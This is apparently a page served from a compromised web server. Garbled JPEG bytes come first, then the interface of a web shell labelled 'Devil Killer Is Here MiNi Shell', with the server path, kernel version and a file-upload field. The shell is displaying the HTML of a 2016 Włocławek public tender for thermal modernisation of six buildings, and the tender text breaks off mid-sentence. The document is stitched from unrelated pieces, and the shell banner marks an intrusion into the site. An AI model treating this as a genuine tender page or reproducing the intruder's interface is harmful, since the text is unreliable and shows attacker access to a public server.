JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160512/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160512/119178-N-2016.html

<p class="kh_header"><b>Włocławek: Termomodernizacja budynków użyteczności publicznej na terenie miasta Włocławek z podziałem na 6 zadań</b><br>
<b>Numer ogłoszenia: 119178 - 2016; data zamieszczenia: 12.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Włocławek - Urząd Miasta Włocławek , ul. Zielony Rynek 11/13, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 54 4144000, faks 54 4144257.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynków użyteczności publicznej na terenie miasta Włocławek z podziałem na 6 zadań.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje swoim zakresem roboty budowlane ujęte w dokumentacji budowlanej, wykonawczej oraz Specyfikacji Technicznej Wykonania i Odbioru Robót w nw budynkach:
1. Przedszkole Publiczne nr 22, ul. Żwirowa 101
2. Przedszkole Publiczne nr 27, ul. Cienista 20
3. Przedszkole Publiczne nr 12, ul. Bukowa 38/40
4. Zespół Szkół Integracyjnych - budynek B, ul. Wesoła 3
5. Przedszkole Publiczne nr 19, ul. Urocza 1
6. Miejski Ośrodek Pomocy Rodzinie, ul. Ogniowa 8/10 we Włocławku.

Przedmiot zamówienia obejmuje  6 nw ZADAŃ:

ZADANIE I-Termomodernizacja  Przedszkola Publicznego nr 22, ul. Żwirowa 101
ZADANIE II-Termomodernizacja Przedszkola Publicznego nr 27, ul. Cienista 20
ZADANIE III-Termomodernizacja Przedszkola Publicznego nr 12, ul. Bukowa 38/40
ZADANIE IV-Termomodernizacja Zespół Szkół Integracyjnych - budynek B, ul. Wesoła 3
ZADANIE V-Termomodernizacja Przedszkola Publicznego nr 19, ul. Urocza 1
ZADANIE VI-Termomodernizacja Miejskiego Ośrodka Pomocy Rodzinie, ul. Ogniowa 8/10 we Włocławku.

Opis robót:
ZADANIE I-Termomodernizacja  Przedszkola Publicznego nr 22, ul. Żwirowa 101
1. Ocieplenie i pokrycie papą termozgrzewalną dachu
2. Ocieplenie ścian zewnętrznych
3. Instalacja odgromowa
4. Wymiana oświetlenia zewnętrznego na energooszczędne
5. Montaż ukryć dla ptaków 

ZADANIE II-Termomodernizacja Przedszkola Publicznego nr 27, ul. Cienista 20
1. Ocieplenie i pokrycie papą termozgrzewalną dachu
2. Ocieplenie ścian zewnętrznych
3. Instalacja solarowa
4. Instalacja odgromowa
5. Wymiana oświetlenia zewnętrznego na energooszczędne
6. Montaż ukryć dla ptaków 
ZADANIE III-Termomodernizacja Przedszkola Publicznego nr 12, ul. Bukowa 38/40
1. Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2. Wymiana stolarki okiennej i drzwiowej zewnętrznej
3. Ocieplenie ścian zewnętrznych
4. Wymiana instalacji c.o. 
5. Wymiana instalacji odgromowej
6. Wymiana oświetlenia zewnętrznego na energooszczędne
7. Montaż ukryć dla ptaków

ZADANIE IV-Termomodernizacja Zespół Szkół Integracyjnych - budynek B, ul. Wesoła 3
1. Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2. Ocieplenie ścian zewnętrznych
3. Wymiana instalacji c.o. 
4. Wymiana instalacji odgromowej
5. Wymiana oświetlenia zewnętrznego na energooszczędne
6. Montaż ukryć dla ptaków

ZADANIE V-Termomodernizacja Przedszkola Publicznego nr 19, ul. Urocza 1 
1. Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2. Ocieplenie ścian zewnętrznych
3. Wymiana instalacji c.o. 
4. Wymiana inst. wod-kan
5. Wymiana opraw oświetlenia wew. na energooszczędne
6. Wymiana instalacji odgromowej
7. Wymiana oświetlenia zewnętrznego na energooszczędne.
8. Montaż ukryć dla ptaków 

Uwaga ! (zadania I-V)
- Roboty będą wykonywane w czynnych obiektach oświatowych.
- Wykonawca jest zobowiązany zapewnić taką organizację robót, aby nie dezorganizować zajęć przedszkolnych i szkolnych.
- Nie przewiduje się przekazania terenu pod zaplecze budowy.

ZADANIE VI - Termomodernizacja Miejskiego Ośrodka Pomocy Rodzinie, ul. Ogniowa 8/10 we Włocławku.

1. Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2. Wymiana stolarki okiennej i drzwiowej zewnętrznej
3. Ocieplenie ścian zewnętrznych
4. Wymiana instalacji c.o. 
5. Wymiana inst. oświetlenia wen. na energooszczędne
6. Wymiana instalacji odgromowej
7. Wymiana oświetlenia zewnętrznego na energooszczędne
8. Montaż ukryć dla ptaków

Uwaga ! (zadanie nr VI)
- Roboty będą wykonywane w czynnym obiekcie MOPR.
- Wykonawca jest zobowiązany zapewnić taką organizację robót, aby nie dezorganizować pracy.
- Nie przewiduje się przekazania terenu pod zaplecze budowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do prowadzonego postępowania o udzielenie zamówienia publicznego każdy Wykonawca zobowiązany jest wnieść wadium w kwocie
a) zadanie nr 1:  3.500,00 złotych.
b) zadanie nr 2:  3.500,00 złotych.
c) zadanie nr 3: 5.000,00 złotych.
d) zadanie nr 4:  5.000,00 złotych.
e) zadanie nr 5: 6.500,00 złotych.
f) zadanie nr 6: 30.000,00 złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ZADANIA I-IV
Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych, obejmujących swoim zakresem łącznie: 
 - termomodernizację dachu i ścian zewnętrznych,
 - wymianę lub montaż instalacji c.o. 
o wartości realizacji co najmniej 100 tysięcy złotych brutto - każda robota.
     ZADANIE V
Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych, obejmujących swoim zakresem łącznie: 
- termomodernizację dachu i ścian zewnętrznych,
- wymianę lub montaż  instalacji c.o.,
- wymianę instalacji wod-kan
- wymianę instalacji elektrycznej
 o wartości realizacji co najmniej 100 tysięcy złotych brutto - każda robota.
     ZADANIE VI
Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się wykonaniem w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 robót budowlanych, obejmujących swoim zakresem łącznie: 
- termomodernizację dachu i ścian zewnętrznych,
- wymianę lub montaż  instalacji c.o.
- wymianę lub montaż  instalacji elektrycznej
 o wartości realizacji co najmniej 100 tysięcy złotych brutto - każda robota.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca, ubiegający się o udzielenie zamówienia, musi wykazać się dysponowaniem wymienionymi poniżej osobami przewidzianymi do realizacji zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia wymienionych poniżej osobami przewidzianymi do realizacji zamówienia, które będą uczestniczyły w realizacji zamówienia i będą odpowiedzialne za kierowanie robotami budowlanymi, zgodnie z dyspozycją art. 12 ustawy z dnia 07 lipca 1994 roku - Prawo budowlane:
1)	co najmniej 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej z min. 3 letnim doświadczeniem na stanowisku kierownika budowy.
2)	co najmniej 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, gazowych oraz wentylacyjnych
3)	co najmniej 1 osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu dokonywania oceny spełniania warunków w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Roboty budowlane, polegające na termomodernizacji dachu i ścian zewnętrznych, wymianie lub montażu  instalacji c.o. (zadania I-IV), termomodernizacji dachu i ścian zewnętrznych, wymianie lub montażu  instalacji c.o., wymianie instalacji wod-kan, instalacji elektrycznej (zadanie V), termomodernizacji dachu i ścian zewnętrznych, wymianie lub montażu  instalacji c.o., instalacji elektrycznej (zadanie VI);</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty. 2. Dowód wniesienia wadium. 3. Pełnomocnictwo do podpisania oferty, o ile nie wynika ono z innych dokumentów załączonych przez Wykonawcę</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość wprowadzania zmiany w treści umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawierania niniejszej umowy lub w przypadku wystąpienia którejkolwiek z następujących okoliczności: 1) przedłużenie terminu realizacji zamówienia może nastąpić w przypadku wystąpienia zdarzeń, niezależnych od Wykonawcy, takich jak: a) wystąpienie okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron niniejszej umowy, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie niniejszej umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi występowania okoliczności siły wyższej, b) wydanie zakazu prowadzenia robót przez organ administracji publicznej, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi obowiązywania zakazu prowadzenia robót, c) wystąpienie kolizji z instalacjami, sieciami lub urządzeniami, dla rozwiązania których niezbędne jest opracowanie projektu zamiennego (zamiennych rozwiązań), przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi wstrzymania robót, d) udzielenie podczas realizacji niniejszej umowy zamówień dodatkowych w trybie art. 67 ust. 1 pkt 5 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, związanych z realizacją zamówienia podstawowego, mających wpływ na umówiony termin realizacji zamówienia (powodujący konieczność jego przedłużenia), przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy do zrealizowania zamówienia dodatkowego, e) wystąpienie kolizji instalacjami, sieciami lub urządzeniami, nieprzewidzianymi w dokumentacji projektowej, których usunięcie będzie miało wpływ na umówiony termin realizacji zamówienia i spowoduje wstrzymanie robót na okres dłuższy niż 10 dni kalendarzowych, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi prowadzenia robót budowlanych związanych z usunięciem tych kolizji, f) wystąpienie konieczności wykonania robót zamiennych, związanych z koniecznością dokonania zmian projektowych bądź zmiany technologii (do wykonania których wystarczy zgoda Zamawiającego oraz projektanta), rozumianych jako wykonanie przez Wykonawcę zamówienia podstawowego w sposób odmienny od sposobu określonego w umowie, a jednocześnie w sposób niepowodujący zwiększenia (zmiany) zakresu świadczenia Wykonawcy, zawartego w ofercie, oraz zwiększenia wynagrodzenia Wykonawcy, z zastrzeżeniem treści sekcji IV.3. pkt 2, g) wystąpienie konieczności wprowadzenia w dokumentacji projektowej, zmian, powodujących wstrzymanie lub przerwanie prowadzonych robót budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz na przeprowadzenie uzgodnień (ustaleń) z właściwymi organami, uzyskanie opinii właściwych organów oraz wydanie decyzji przez właściwe organy, z zastrzeżeniem treści sekcji IV.3. pkt 7, h) wystąpienie konieczności przeprowadzenia przez Zamawiającego postępowań o udzielenie zamówienia publicznego na podstawie ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych w trybie przetargu nieograniczonego lub przetargu ograniczonego, których przedmiot stanowi realizacja robót nieobjętych przedmiotem niniejszego zamówienia, koniecznych dla realizacji zamówienia podstawowego, ale niewypełniających możliwości skorzystania dla ich realizacji z dyspozycji art. 67 ust. 1 pkt 5 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (w szczególności będących wynikiem błędów projektowych), mających wpływ na uzgodniony termin zakończenia realizacji prowadzonej inwestycji (powodujących konieczność jego wydłużenia), przy czym przesunięcie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą okresowi, w którym nie istniała możliwość wykonywania jakichkolwiek robót; 2) dokonanie podczas okresu obowiązywania umowy w sprawie zamówienia publicznego zmiany zgłoszonych przez Wykonawcę osób, o których mowa w treści § 9 ust. 3 pkt 1 - 2 wzoru umowy, z zastrzeżeniem treści sekcji IV.3. pkt 3; 3) dokonanie zmiany wynagrodzenia umownego na skutek niewykonania pełnego zakresu robót 